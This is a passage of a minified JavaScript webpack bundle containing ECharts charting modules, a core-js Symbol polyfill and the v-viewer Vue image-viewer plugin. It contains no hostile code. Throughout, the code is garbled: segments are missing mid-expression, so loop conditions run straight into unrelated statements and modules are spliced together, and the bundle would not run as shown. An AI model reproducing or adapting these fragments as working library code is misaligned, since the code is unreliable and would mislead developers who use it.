x=s(b,{width:n.getWidth(),height:n.getHeight()},e.get("padding"));c||(c=e.get("left")||e.get("right"),"middle"===c&&(c="center"),"right"===c?x.x+=x.width:"center"===c&&(x.x+=x.width/2)),h||(h=e.get("top")||e.get("bottom"),"center"===h&&(h="middle"),"bottom"===h?x.y+=x.height:"middle"===h&&(x.y+=x.height/2),h=h||"top"),r.attr("position",[x.x,x.y]);var w={textAlign:c,textVerticalAlign:h};d.setStyle(w),g.setStyle(w),_=r.getBoundingRect();var k=x.margin,S=e.getItemStyle(["color","opacity"]);S.fill=e.get("backgroundColor");var M=new o.Rect({shape:{x:_.x-k[3],y:_.y-k[0],width:_.width+k[1]+k[3],height:_.height+k[0]+k[2],r:e.get("borderRadius")},style:S,subPixelOptimize:!0,silent:!0});r.add(M)}}})},6374:function(e,t,n){n("a4d3"),n("e01a"),n("d3b7"),n("d28b"),n("3ca3"),n("ddb0");var i=n("6613");function r(e,t){var n="undefined"!==typeof Symbol&&e[Symbol.iterator]||e["@@iterator"];if(!n){if(Array.isArray(e)||(n=i(e))||t&&e&&"number"===typeof e.length){n&&(e=n);var r=0,o=function(){};return{s:o,n:function(){return r>=e.length?{done:!0}:{done:!1,value:e[r++]}},e:function(e){throw e},f:o}}throw new TypeError("Invalid attempt to iterate non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}var a,s=!0,l=!1;return{s:function(){n=n.call(e)},n:function(){var e=n.next();return s=e.done,e},e:function(e){l=!0,a=e},f:function(){try{s||null==n["return"]||n["return"]()}finally{if(l)throw a}}}}e.exports=r,e.exports.__esModule=!0,e.exports["default"]=e.exports},6438:function(e,t,n){var i=n("03d6"),r=n("9742").concat("length","prototype");t.f=Object.getOwnPropertyNames||function(e){return i(e,r)}},"64e1":function(e,t,n){},6547:function(e,t,n){var i=n("a691"),r=n("1d80"),o=function(e){return function(t,n){var o,a,s=String(r(t)),l=i(n),u=s.length;return l<0||l>=u?e?"":void 0:(o=s.charCodeAt(l),o<55296||o>56319||l+1===u||(a=s.charCodeAt(l+1))<56320||a>57343?e?s.charAt(l):o:e?s.slice(l,l+2):a-56320+(o-55296<<10)+65536)}};e.exports={codeAt:o(!1),charAt:o(!0)}},6569:function(e,t,n){var i=n("6d8b"),r=n("e0d3");function o(e){a(e),s(e)}function a(e){if(!e.parallel){var t=!1;i.each(e.series,(function(e){e&&"parallel"===e.type&&(t=!0)})),t&&(e.parallel=[{}])}}function s(e){var t=r.normalizeToArray(e.parallelAxis);i.each(t,(function(t){if(i.isObject(t)){var n=t.parallelIndex||0,o=r.normalizeToArray(e.parallel)[n];o&&o.parallelAxisDefault&&i.merge(t,o.parallelAxisDefault,!1)}}))}e.exports=o},6582:function(e,t,n){var i=n("cccd"),r={seriesType:"lines",plan:i(),reset:function(e){var t=e.coordinateSystem,n=e.get("polyline"),i=e.pipelineContext.large;function r(r,o){var a=[];if(i){var s,l=r.end-r.start;if(n){for(var u=0,c=r.start;c>1)%2;s.cssText=["position: absolute","visibility: hidden","padding: 0","margin: 0","border-width: 0","user-select: none","width:0","height:0",i[l]+":0",r[u]+":0",i[1-l]+":auto",r[1-u]+":auto",""].join("!important;"),e.appendChild(a),n.push(a)}return n}function h(e,t,n){for(var i=n?"invTrans":"trans",r=t[i],a=t.srcCoords,s=!0,l=[],u=[],c=0;c<4;c++){var h=e[c].getBoundingClientRect(),d=2*c,f=h.left,p=h.top;l.push(f,p),s=s&&a&&f===a[d]&&p===a[d+1],u.push(e[c].offsetLeft,e[c].offsetTop)}return s&&r?r:(t.srcCoords=l,t[i]=n?o(u,l):o(l,u))}function d(e){return"CANVAS"===e.nodeName.toUpperCase()}t.transformLocalCoord=l,t.transformCoordWithViewport=u,t.isCanvasEl=d},"65f0":function(e,t,n){var i=n("861d"),r=n("e8b5"),o=n("b622"),a=o("species");e.exports=function(e,t){var n;return r(e)&&(n=e.constructor,"function"!=typeof n||n!==Array&&!r(n.prototype)?i(n)&&(n=n[a],null===n&&(n=void 0)):n=void 0),new(void 0===n?Array:n)(0===t?0:t)}},6613:function(e,t,n){n("fb6a"),n("d3b7"),n("b0c0"),n("a630"),n("3ca3"),n("ac1f"),n("00b4");var i=n("5a43");function r(e,t){if(e){if("string"===typeof e)return i(e,t);var n=Object.prototype.toString.call(e).slice(8,-1);return"Object"===n&&e.constructor&&(n=e.constructor.name),"Map"===n||"Set"===n?Array.from(e):"Arguments"===n||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n)?i(e,t):void 0}}e.exports=r,e.exports.__esModule=!0,e.exports["default"]=e.exports},6679:function(e,t,n){var i=n("4e08"),r=(i.__DEV__,n("3eba")),o=n("cd33"),a=r.extendComponentView({type:"axis",_axisPointer:null,axisPointerClass:null,render:function(e,t,n,i){this.axisPointerClass&&o.fixValue(e),a.superApply(this,"render",arguments),s(this,e,t,n,i,!0)},updateAxisPointer:function(e,t,n,i,r){s(this,e,t,n,i,!1)},remove:function(e,t){var n=this._axisPointer;n&&n.remove(t),a.superApply(this,"remove",arguments)},dispose:function(e,t){l(this,t),a.superApply(this,"dispose",arguments)}});function s(e,t,n,i,r,s){var u=a.getAxisPointerClass(e.axisPointerClass);if(u){var c=o.getAxisPointerModel(t);c?(e._axisPointer||(e._axisPointer=new u)).render(t,c,i,s):l(e,i)}}function l(e,t,n){var i=e._axisPointer;i&&i.dispose(t,n),e._axisPointer=null}var u=[];a.registerAxisPointerClass=function(e,t){u[e]=t},a.getAxisPointerClass=function(e){return e&&u[e]};var c=a;e.exports=c},"66a4":function(e,t,n){var i=n("6d8b");function r(e){var t=e&&e.timeline;i.isArray(t)||(t=t?[t]:[]),i.each(t,(function(e){e&&o(e)}))}function o(e){var t=e.type,n={number:"value",time:"time"};if(n[t]&&(e.axisType=n[t],delete e.type),a(e),s(e,"controlPosition")){var r=e.controlStyle||(e.controlStyle={});s(r,"position")||(r.position=e.controlPosition),"none"!==r.position||s(r,"show")||(r.show=!1,delete r.position),delete e.controlPosition}i.each(e.data||[],(function(e){i.isObject(e)&&!i.isArray(e)&&(!s(e,"value")&&s(e,"name")&&(e.value=e.name),a(e))}))}function a(e){var t=e.itemStyle||(e.itemStyle={}),n=t.emphasis||(t.emphasis={}),r=e.label||e.label||{},o=r.normal||(r.normal={}),a={normal:1,emphasis:1};i.each(r,(function(e,t){a[t]||s(o,t)||(o[t]=e)})),n.label&&!s(r,"emphasis")&&(r.emphasis=n.label,delete n.label)}function s(e,t){return e.hasOwnProperty(t)}e.exports=r},"66fc":function(e,t,n){var i=n("6d8b"),r=n("84ce"),o=function(e,t,n,i,o){r.call(this,e,t,n),this.type=i||"value",this.position=o||"bottom",this.orient=null};o.prototype={constructor:o,model:null,isHorizontal:function(){var e=this.position;return"top"===e||"bottom"===e},pointToData:function(e,t){return this.coordinateSystem.pointToData(e,t)[0]},toGlobalCoord:null,toLocalCoord:null},i.inherits(o,r);var a=o;e.exports=a},"675a":function(e,t){function n(e){var t=e.findComponents({mainType:"legend"});t&&t.length&&e.eachSeriesByType("graph",(function(e){var n=e.getCategoriesData(),i=e.getGraph(),r=i.data,o=n.mapArray(n.getName);r.filterSelf((function(e){var n=r.getItemModel(e),i=n.getShallow("category");if(null!=i){"number"===typeof i&&(i=o[i]);for(var a=0;a0?1:-1,a=i.height>0?1:-1;return{x:i.x+o*r/2,y:i.y+a*r/2,width:i.width-o*r,height:i.height-a*r}},polar:function(e,t,n){var i=e.getItemLayout(t);return{cx:i.cx,cy:i.cy,r0:i.r0,r:i.r,startAngle:i.startAngle,endAngle:i.endAngle}}};function I(e){return null!=e.startAngle&&null!=e.endAngle&&e.startAngle===e.endAngle}function D(e,t,n,i,r,s,u,c){var h=t.getItemVisual(n,"color"),d=t.getItemVisual(n,"opacity"),f=t.getVisual("borderColor"),p=i.getModel("itemStyle"),g=i.getModel("emphasis.itemStyle").getBarItemStyle();c||e.setShape("r",p.get("barBorderRadius")||0),e.useStyle(o.defaults({stroke:I(r)?"none":f,fill:I(r)?"none":h,opacity:d},p.getBarItemStyle()));var m=i.getShallow("cursor");m&&e.attr("cursor",m);var v=u?r.height>0?"bottom":"top":r.width>0?"left":"right";c||l(e.style,g,i,h,s,n,v),I(r)&&(g.fill=g.stroke="none"),a.setHoverStyle(e,g)}function L(e,t){var n=e.get(y)||0,i=isNaN(t.width)?Number.MAX_VALUE:Math.abs(t.width),r=isNaN(t.height)?Number.MAX_VALUE:Math.abs(t.height);return Math.min(n,i,r)}var E=h.extend({type:"largeBar",shape:{points:[]},buildPath:function(e,t){for(var n=t.points,i=this.__startPoint,r=this.__baseDimIdx,o=0;o=0?n:null}),30,!1);function R(e,t,n){var i=e.__baseDimIdx,r=1-i,o=e.shape.points,a=e.__largeDataIndices,s=Math.abs(e.__barWidth/2),l=e.__startPoint[r];_[0]=t,_[1]=n;for(var u=_[i],c=_[1-i],h=u-s,d=u+s,f=0,p=o.length/2;f=h&&m<=d&&(l<=v?c>=l&&c<=v:c>=v&&c<=l))return a[f]}return-1}function N(e,t,n){var i=n.getVisual("borderColor")||n.getVisual("color"),r=t.getModel("itemStyle").getItemStyle(["color","borderColor"]);e.useStyle(r),e.style.fill=null,e.style.stroke=i,e.style.lineWidth=n.getLayout("barWidth")}function z(e,t,n){var i=t.get("borderColor")||t.get("color"),r=t.getItemStyle(["color","borderColor"]);e.useStyle(r),e.style.fill=null,e.style.stroke=i,e.style.lineWidth=n.getLayout("barWidth")}function F(e,t,n){var i,r="polar"===n.type;return i=r?n.getArea():n.grid.getRect(),r?{cx:i.cx,cy:i.cy,r0:e?i.r0:t.r0,r:e?i.r:t.r,startAngle:e?t.startAngle:0,endAngle:e?t.endAngle:2*Math.PI}:{x:e?t.x:i.x,y:e?i.y:t.y,width:e?t.width:i.width,height:e?i.height:t.height}}function V(e,t,n){var i="polar"===e.type?a.Sector:a.Rect;return new i({shape:F(t,n,e),silent:!0,z2:0})}e.exports=x},6858:function(e,t,n){"use strict";var i=n("2f9a"),r=n("ea34"),o=n("8a0d"),a=n("6ca1");e.exports=n("393a")(Array,"Array",(function(e,t){this._t=a(e),this._i=0,this._k=t}),(function(){var e=this._t,t=this._k,n=this._i++;return!e||n>=e.length?(this._t=void 0,r(1)):r(0,"keys"==t?n:"values"==t?e[n]:[n,e[n]])}),"values"),o.Arguments=o.Array,i("keys"),i("values"),i("entries")},"68ab":function(e,t,n){var i=n("4a3f"),r=i.quadraticProjectPoint;function o(e,t,n,i,o,a,s,l,u){if(0===s)return!1;var c=s;if(u>t+c&&u>i+c&&u>a+c||ue+c&&l>n+c&&l>o+c||lr)X(e,n=i[r++],t[n]);return e},J=function(e,t){return void 0===t?S(e):K(S(e),t)},Q=function(e){var t=V.call(this,e=w(e,!0));return!(this===q&&r(j,e)&&!r(H,e))&&(!(t||!r(this,e)||!r(j,e)||r(this,z)&&this[z][e])||t)},ee=function(e,t){if(e=x(e),t=w(t,!0),e!==q||!r(j,t)||r(H,t)){var n=D(e,t);return!n||!r(j,t)||r(e,z)&&e[z][t]||(n.enumerable=!0),n}},te=function(e){var t,n=E(x(e)),i=[],o=0;while(n.length>o)r(j,t=n[o++])||t==z||t==l||i.push(t);return i},ne=function(e){var t,n=e===q,i=E(n?H:x(e)),o=[],a=0;while(i.length>a)!r(j,t=i[a++])||n&&!r(q,t)||o.push(j[t]);return o};G||(O=function(){if(this instanceof O)throw TypeError("Symbol is not a constructor!");var e=d(arguments.length>0?arguments[0]:void 0),t=function(n){this===q&&t.call(H,n),r(this,z)&&r(this[z],e)&&(this[z][e]=!1),U(this,e,k(1,n))};return o&&$&&U(q,e,{configurable:!0,set:t}),Z(e)},s(O[N],"toString",(function(){return this._k})),A.f=ee,T.f=X,n("6438").f=M.f=te,n("1917").f=Q,C.f=ne,o&&!n("e444")&&s(q,"propertyIsEnumerable",Q,!0),p.f=function(e){return Z(f(e))}),a(a.G+a.W+a.F*!G,{Symbol:O});for(var ie="hasInstance,isConcatSpreadable,iterator,match,replace,search,species,split,toPrimitive,toStringTag,unscopables".split(","),re=0;ie.length>re;)f(ie[re++]);for(var oe=I(f.store),ae=0;oe.length>ae;)g(oe[ae++]);a(a.S+a.F*!G,"Symbol",{for:function(e){return r(B,e+="")?B[e]:B[e]=O(e)},keyFor:function(e){if(!Y(e))throw TypeError(e+" is not a symbol!");for(var t in B)if(B[t]===e)return t},useSetter:function(){$=!0},useSimple:function(){$=!1}}),a(a.S+a.F*!G,"Object",{create:J,defineProperty:X,defineProperties:K,getOwnPropertyDescriptor:ee,getOwnPropertyNames:te,getOwnPropertySymbols:ne});var se=u((function(){C.f(1)}));a(a.S+a.F*se,"Object",{getOwnPropertySymbols:function(e){return C.f(b(e))}}),P&&a(a.S+a.F*(!G||u((function(){var e=O();return"[null]"!=R([e])||"{}"!=R({a:e})||"{}"!=R(Object(e))}))),"JSON",{stringify:function(e){var t,n,i=[e],r=1;while(arguments.length>r)i.push(arguments[r++]);if(n=t=i[1],(_(t)||void 0!==e)&&!Y(e))return v(t)||(t=function(e,t){if("function"==typeof n&&(t=n.call(this,e,t)),!Y(t))return t}),i[1]=t,R.apply(P,i)}}),O[N][F]||n("051b")(O[N],F,O[N].valueOf),h(O,"Symbol"),h(Math,"Math",!0),h(i.JSON,"JSON",!0)},6944:function(e,t,n){(function(t,i){e.exports=i(n("c82c"),n("2b0e"))})(0,(function(e,t){return function(e){var t={};function n(i){if(t[i])return t[i].exports;var r=t[i]={i:i,l:!1,exports:{}};return e[i].call(r.exports,r,r.exports,n),r.l=!0,r.exports}return n.m=e,n.c=t,n.i=function(e){return e},n.d=function(e,t,i){n.o(e,t)||Object.defineProperty(e,t,{configurable:!1,enumerable:!0,get:i})},n.n=function(e){var t=e&&e.__esModule?function(){return e["default"]}:function(){return e};return n.d(t,"a",t),t},n.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},n.p="",n(n.s=6)}([function(t,n){t.exports=e},function(e,t,n){"use strict";function i(){var e={},t=!1,n=0,r=arguments.length;function o(n){for(var r in n)Object.prototype.hasOwnProperty.call(n,r)&&(t&&"[object Object]"===Object.prototype.toString.call(n[r])?e[r]=i(!0,e[r],n[r]):e[r]=n[r])}for("[object Boolean]"===Object.prototype.toString.call(arguments[0])&&(t=arguments[0],n++);n0&&void 0!==arguments[0]?arguments[0]:{},t=e.images,i=void 0===t?[]:t,a=e.options,l=void 0===a?{}:a;l=n.i(o["a"])(l,{inline:!1});var u=s.a.extend({render:function(e){return e("div",{style:{display:"none"},class:["__viewer-token"]},i.map((function(t){return e("img",{attrs:"string"===typeof t?{src:t}:t})})))}}),c=new u;c.$mount(),document.body.appendChild(c.$el);var h=new r.a(c.$el,l),d=h.destroy.bind(h);return h.destroy=function(){return d(),c.$destroy(),document.body.removeChild(c.$el),h},h.show(),c.$el.addEventListener("hidden",(function(){this.viewer===h&&h.destroy()})),h};t["a"]=l},function(e,t,n){"use strict";(function(e){var i=n(0),r=n.n(i),o=n(7),a=(n.n(o),n(2)),s=n.n(a),l=function(){var t=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{},i=t.name,a=void 0===i?"viewer":i,l=t.debug,u=void 0!==l&&l;function c(e,t){var n=arguments.length>2&&void 0!==arguments[2]&&arguments[2],i=arguments.length>3&&void 0!==arguments[3]&&arguments[3];s.a.nextTick((function(){i&&!h(e)||(n||!e["$"+a]?(p(e),e["$"+a]=new r.a(e,t),v("Viewer created")):(e["$"+a].update(),v("Viewer updated")))}))}function h(e){var t=e.innerHTML.match(//g),n=t?t.join(""):void 0;return e.__viewerImageDiffCache===n?(v("Element change detected, but image(s) has not changed"),!1):(v("Image change detected"),e.__viewerImageDiffCache=n,!0)}function d(t,n,i,r){g(t);var o=e.MutationObserver||e.WebKitMutationObserver||e.MozMutationObserver;if(o){var a=new o((function(e){e.forEach((function(e){v("Viewer mutation:"+e.type),i(t,n,r,!0)}))})),s={attributes:!0,childList:!0,characterData:!0,subtree:!0};a.observe(t,s),t.__viewerMutationObserver=a,v("Observer created")}else v("Observer not supported")}function f(e,t,n,i){var r=t.expression,o=/^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*|\['[^']*?']|\["[^"]*?"]|\[\d+]|\[[A-Za-z_$][\w$]*])*$/;r&&o.test(r)?(e.__viewerUnwatch=n.context.$watch(r,(function(t,n){v("Change detected by watcher: ",r),i(e,t,!0)}),{deep:!0}),v("Watcher created, expression: ",r)):v("Only simple dot-delimited paths can create watcher")}function p(e){e["$"+a]&&(e["$"+a].destroy(),delete e["$"+a],v("Viewer destroyed"))}function g(e){e.__viewerMutationObserver&&(e.__viewerMutationObserver.disconnect(),delete e.__viewerMutationObserver,v("Observer destroyed"))}function m(e){e.__viewerUnwatch&&(e.__viewerUnwatch(),delete e.__viewerUnwatch,v("Watcher destroyed"))}function v(){var e;u&&(e=console).log.apply(e,arguments)}var y={bind:function(e,t,i){v("Viewer bind");var r=n.i(o["debounce"])(50,c);r(e,t.value),f(e,t,i,r),t.modifiers.static||d(e,t.value,r,t.modifiers.rebuild)},unbind:function(e,t){v("Viewer unbind"),g(e),m(e),p(e)}};return y};t["a"]=l}).call(t,n(9))},function(e,t,n){var i=n(10)(n(8),n(11),null,null);i.options.__file="/Volumes/public/Workspace/web/v-viewer/src/component.vue",i.esModule&&Object.keys(i.esModule).some((function(e){return"default"!==e&&"__esModule"!==e}))&&console.error("named exports are not supported in *.vue files."),i.options.functional&&console.error("[vue-loader] component.vue: functional components are not supported with templates, they should use render functions."),e.exports=i.exports},function(e,t,n){"use strict";Object.defineProperty(t,"__esModule",{value:!0});var i=n(1),r=n(0),o=n.n(r),a=n(5),s=n.n(a),l=n(4),u=n(3);n.d(t,"component",(function(){return s.a})),n.d(t,"directive",(function(){return l["a"]})),n.d(t,"api",(function(){return u["a"]})),n.d(t,"Viewer",(function(){return o.a})),t["default"]={install:function(e){var t=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},r=t.name,a=void 0===r?"viewer":r,c=t.debug,h=void 0!==c&&c,d=t.defaultOptions;o.a.setDefaults(d),e.component(a,n.i(i["a"])(s.a,{name:a})),e.directive(a,n.i(l["a"])({name:a,debug:h})),e.prototype["$"+a+"Api"]=u["a"]},setDefaults:function(e){o.a.setDefaults(e)}}},function(e,t,n){var i,r,o,a="function"===typeof Symbol&&"symbol"===typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"===typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e};(function(n,s){"object"===a(t)&&"undefined"!==typeof e?s(t):(r=[t],i=s,o="function"===typeof i?i.apply(t,r):i,void 0===o||(e.exports=o))})(0,(function(e){"use strict";function t(e,t,n,i){var r,o=!1,a=0;function s(){r&&clearTimeout(r)}function l(){s(),o=!0}function u(){for(var l=arguments.length,u=new Array(l),c=0;ce?f():!0!==t&&(r=setTimeout(i?p:f,void 0===i?e-d:e)))}return"boolean"!==typeof t&&(i=n,n=t,t=void 0),u.cancel=l,u}function n(e,n,i){return void 0===i?t(e,n,!1):t(e,i,!1!==n)}e.debounce=n,e.throttle=t,Object.defineProperty(e,"__esModule",{value:!0})}))},function(e,t,n){"use strict";Object.defineProperty(t,"__esModule",{value:!0});var i=n(0),r=n.n(i);t["default"]={props:{images:{type:Array},rebuild:{type:Boolean,default:!1},trigger:{},options:{type:Object}},data:function(){return{}},computed:{},methods:{onChange:function(){this.rebuild?this.rebuildViewer():this.updateViewer()},rebuildViewer:function(){this.destroyViewer(),this.createViewer()},updateViewer:function(){this.$viewer?(this.$viewer.update(),this.$emit("inited",this.$viewer)):this.createViewer()},destroyViewer:function(){this.$viewer&&this.$viewer.destroy()},createViewer:function(){this.$viewer=new r.a(this.$el,this.options),this.$emit("inited",this.$viewer)}},watch:{images:function(){var e=this;this.$nextTick((function(){e.onChange()}))},trigger:{handler:function(){var e=this;this.$nextTick((function(){e.onChange()}))},deep:!0},options:{handler:function(){var e=this;this.$nextTick((function(){e.rebuildViewer()}))},deep:!0}},mounted:function(){this.createViewer()},destroyed:function(){this.destroyViewer()}}},function(e,t){var n,i="function"===typeof Symbol&&"symbol"===typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"===typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e};n=function(){return this}();try{n=n||Function("return this")()||(0,eval)("this")}catch(r){"object"===("undefined"===typeof window?"undefined":i(window))&&(n=window)}e.exports=n},function(e,t){e.exports=function(e,t,n,i){var r,o=e=e||{},a=typeof e.default;"object"!==a&&"function"!==a||(r=e,o=e.default);var s="function"===typeof o?o.options:o;if(t&&(s.render=t.render,s.staticRenderFns=t.staticRenderFns),n&&(s._scopeId=n),i){var l=Object.create(s.computed||null);Object.keys(i).forEach((function(e){var t=i[e];l[e]=function(){return t}})),s.computed=l}return{esModule:r,exports:o,options:s}}},function(e,t,n){e.exports={render:function(){var e=this,t=e.$createElement,n=e._self._c||t;return n("div",[e._t("default",null,{images:e.images,options:e.options})],2)},staticRenderFns:[]},e.exports.render._withStripped=!0}])}))},"697e":function(e,t,n){var i=n("4e08"),r=(i.__DEV__,n("6d8b")),o=n("18c0"),a=n("89e3"),s=n("e0d8"),l=n("3842"),u=n("9d57"),c=u.prepareLayoutBarSeries,h=u.makeColumnLayout,d=u.retrieveColumnLayout,f=n("9850");function p(e,t){var n,i,o,a=e.type,s=t.getMin(),u=t.getMax(),d=e.getExtent();"ordinal"===a?n=t.getCategories().length:(i=t.get("boundaryGap"),r.isArray(i)||(i=[i||0,i||0]),"boolean"===typeof i[0]&&(i=[0,0]),i[0]=l.parsePercent(i[0],1),i[1]=l.parsePercent(i[1],1),o=d[1]-d[0]||Math.abs(d[0])),"dataMin"===s?s=d[0]:"function"===typeof s&&(s=s({min:d[0],max:d[1]})),"dataMax"===u?u=d[1]:"function"===typeof u&&(u=u({min:d[0],max:d[1]}));var f=null!=s,p=null!=u;null==s&&(s="ordinal"===a?n?0:NaN:d[0]-i[0]*o),null==u&&(u="ordinal"===a?n?n-1:NaN:d[1]+i[1]*o),(null==s||!isFinite(s))&&(s=NaN),(null==u||!isFinite(u))&&(u=NaN),e.setBlank(r.eqNaN(s)||r.eqNaN(u)||"ordinal"===a&&!e.getOrdinalMeta().categories.length),t.getNeedCrossZero()&&(s>0&&u>0&&!f&&(s=0),s<0&&u<0&&!p&&(u=0));var m=t.ecModel;if(m&&"time"===a){var v,y=c("bar",m);if(r.each(y,(function(e){v|=e.getBaseAxis()===t.axis})),v){var _=h(y),b=g(s,u,t,_);s=b.min,u=b.max}}return{extent:[s,u],fixMin:f,fixMax:p}}function g(e,t,n,i){var o=n.axis.getExtent(),a=o[1]-o[0],s=d(i,n.axis);if(void 0===s)return{min:e,max:t};var l=1/0;r.each(s,(function(e){l=Math.min(e.offset,l)}));var u=-1/0;r.each(s,(function(e){u=Math.max(e.offset+e.width,u)})),l=Math.abs(l),u=Math.abs(u);var c=l+u,h=t-e,f=1-(l+u)/a,p=h/f-h;return t+=p*(u/c),e-=p*(l/c),{min:e,max:t}}function m(e,t){var n=p(e,t),i=n.extent,r=t.get("splitNumber");"log"===e.type&&(e.base=t.get("logBase"));var o=e.type;e.setExtent(i[0],i[1]),e.niceExtent({splitNumber:r,fixMin:n.fixMin,fixMax:n.fixMax,minInterval:"interval"===o||"time"===o?t.get("minInterval"):null,maxInterval:"interval"===o||"time"===o?t.get("maxInterval"):null});var a=t.get("interval");null!=a&&e.setInterval&&e.setInterval(a)}function v(e,t){if(t=t||e.get("type"),t)switch(t){case"category":return new o(e.getOrdinalMeta?e.getOrdinalMeta():e.getCategories(),[1/0,-1/0]);case"value":return new a;default:return(s.getClass(t)||a).create(e)}}function y(e){var t=e.scale.getExtent(),n=t[0],i=t[1];return!(n>0&&i>0||n<0&&i<0)}function _(e){var t=e.getLabelModel().get("formatter"),n="category"===e.type?e.scale.getExtent()[0]:null;return"string"===typeof t?(t=function(t){return function(n){return n=e.scale.getLabel(n),t.replace("{value}",null!=n?n:"")}}(t),t):"function"===typeof t?function(i,r){return null!=n&&(r=i-n),t(b(e,i),r)}:function(t){return e.scale.getLabel(t)}}function b(e,t){return"category"===e.type?e.scale.getLabel(t):t}function x(e){var t=e.model,n=e.scale;if(t.get("axisLabel.show")&&!n.isBlank()){var i,r,o="category"===e.type,a=n.getExtent();o?r=n.count():(i=n.getTicks(),r=i.length);var s,l=e.getLabelModel(),u=_(e),c=1;r>40&&(c=Math.ceil(r/40));for(var h=0;hn.blockIndex,o=r?n.step:null,a=i&&i.modDataCount,s=null!=a?Math.ceil(a/o):null;return{step:o,modBy:s,modDataCount:a}}},y.getPipeline=function(e){return this._pipelineMap.get(e)},y.updateStreamModes=function(e,t){var n=this._pipelineMap.get(e.uid),i=e.getData(),r=i.count(),o=n.progressiveEnabled&&t.incrementalPrepareRender&&r>=n.threshold,a=e.get("large")&&r>=e.get("largeThreshold"),s="mod"===e.get("progressiveChunkMode")?r:null;e.pipelineContext=n.context={progressiveRender:o,modDataCount:s,large:a}},y.restorePipelines=function(e){var t=this,n=t._pipelineMap=s();e.eachSeries((function(e){var i=e.getProgressive(),r=e.uid;n.set(r,{id:r,head:null,tail:null,threshold:e.getProgressiveThreshold(),progressiveEnabled:i&&!(e.preventIncremental&&e.preventIncremental()),blockIndex:-1,step:Math.round(i||700),count:0}),E(t,e,e.dataTask)}))},y.prepareStageTasks=function(){var e=this._stageTaskMap,t=this.ecInstance.getModel(),n=this.api;r(this._allHandlers,(function(i){var r=e.get(i.uid)||e.set(i.uid,[]);i.reset&&x(this,i,r,t,n),i.overallReset&&w(this,i,r,t,n)}),this)},y.prepareView=function(e,t,n,i){var r=e.renderTask,o=r.context;o.model=t,o.ecModel=n,o.api=i,r.__block=!e.incrementalPrepareRender,E(this,t,r)},y.performDataProcessorTasks=function(e,t){_(this,this._dataProcessorHandlers,e,t,{block:!0})},y.performVisualTasks=function(e,t,n){_(this,this._visualHandlers,e,t,n)},y.performSeriesTasks=function(e){var t;e.eachSeries((function(e){t|=e.dataTask.perform()})),this.unfinished|=t},y.plan=function(){this._pipelineMap.each((function(e){var t=e.tail;do{if(t.__block){e.blockIndex=t.__idxInPipeline;break}t=t.getUpstream()}while(t)}))};var b=y.updatePayload=function(e,t){"remain"!==t&&(e.context.payload=t)};function x(e,t,n,i,r){var o=n.seriesTaskMap||(n.seriesTaskMap=s()),a=t.seriesType,l=t.getTargetSeries;function u(n){var a=n.uid,s=o.get(a)||o.set(a,c({plan:C,reset:T,count:L}));s.context={model:n,ecModel:i,api:r,useClearVisual:t.isVisual&&!t.isLayout,plan:t.plan,reset:t.reset,scheduler:e},E(e,n,s)}t.createOnAllSeries?i.eachRawSeries(u):a?i.eachRawSeriesByType(a,u):l&&l(i,r).each(u);var h=e._pipelineMap;o.each((function(e,t){h.get(t)||(e.dispose(),o.removeKey(t))}))}function w(e,t,n,i,o){var a=n.overallTask=n.overallTask||c({reset:k});a.context={ecModel:i,api:o,overallReset:t.overallReset,scheduler:e};var l=a.agentStubMap=a.agentStubMap||s(),u=t.seriesType,h=t.getTargetSeries,d=!0,f=t.modifyOutputEnd;function p(t){var n=t.uid,i=l.get(n);i||(i=l.set(n,c({reset:S,onDirty:A})),a.dirty()),i.context={model:t,overallProgress:d,modifyOutputEnd:f},i.agent=a,i.__block=d,E(e,t,i)}u?i.eachRawSeriesByType(u,p):h?h(i,o).each(p):(d=!1,r(i.getSeries(),p));var g=e._pipelineMap;l.each((function(e,t){g.get(t)||(e.dispose(),a.dirty(),l.removeKey(t))}))}function k(e){e.overallReset(e.ecModel,e.api,e.payload)}function S(e,t){return e.overallProgress&&M}function M(){this.agent.dirty(),this.getDownstream().dirty()}function A(){this.agent&&this.agent.dirty()}function C(e){return e.plan&&e.plan(e.model,e.ecModel,e.api,e.payload)}function T(e){e.useClearVisual&&e.data.clearAllVisual();var t=e.resetDefines=m(e.reset(e.model,e.ecModel,e.api,e.payload));return t.length>1?o(t,(function(e,t){return D(t)})):I}var I=D(0);function D(e){return function(t,n){var i=n.data,r=n.resetDefines[e];if(r&&r.dataEach)for(var o=t.start;o=0;l--)if(i[l]<=t)break;l=Math.min(l,r-2)}else{for(var l=o;lt)break;l=Math.min(l-1,r-2)}a.lerp(e.position,n[l],n[l+1],(t-i[l])/(i[l+1]-i[l]));var u=n[l+1][0]-n[l][0],c=n[l+1][1]-n[l][1];e.rotation=-Math.atan2(c,u)-Math.PI/2,this._lastFrame=l,this._lastFramePercent=t,e.ignore=!1}},r.inherits(s,o);var u=s;e.exports=u},"6acf":function(e,t,n){var i=n("eda2"),r=n("dcb3"),o=n("2306"),a=n("ff2e"),s=n("1687"),l=n("fab2"),u=n("6679"),c=r.extend({makeElOption:function(e,t,n,r,o){var s=n.axis;"angle"===s.dim&&(this.animationThreshold=Math.PI/18);var l,u=s.polar,c=u.getOtherAxis(s),f=c.getExtent();l=s["dataTo"+i.capitalFirst(s.dim)](t);var p=r.get("type");if(p&&"none"!==p){var g=a.buildElStyle(r),m=d[p](s,u,l,f,g);m.style=g,e.graphicKey=m.type,e.pointer=m}var v=r.get("label.margin"),y=h(t,n,r,u,v);a.buildLabelElOption(e,n,r,o,y)}});function h(e,t,n,i,r){var a=t.axis,u=a.dataToCoord(e),c=i.getAngleAxis().getExtent()[0];c=c/180*Math.PI;var h,d,f,p=i.getRadiusAxis().getExtent();if("radius"===a.dim){var g=s.create();s.rotate(g,g,c),s.translate(g,g,[i.cx,i.cy]),h=o.applyTransform([u,-r],g);var m=t.getModel("axisLabel").get("rotate")||0,v=l.innerTextLayout(c,m*Math.PI/180,-1);d=v.textAlign,f=v.textVerticalAlign}else{var y=p[1];h=i.coordToPoint([y+r,u]);var 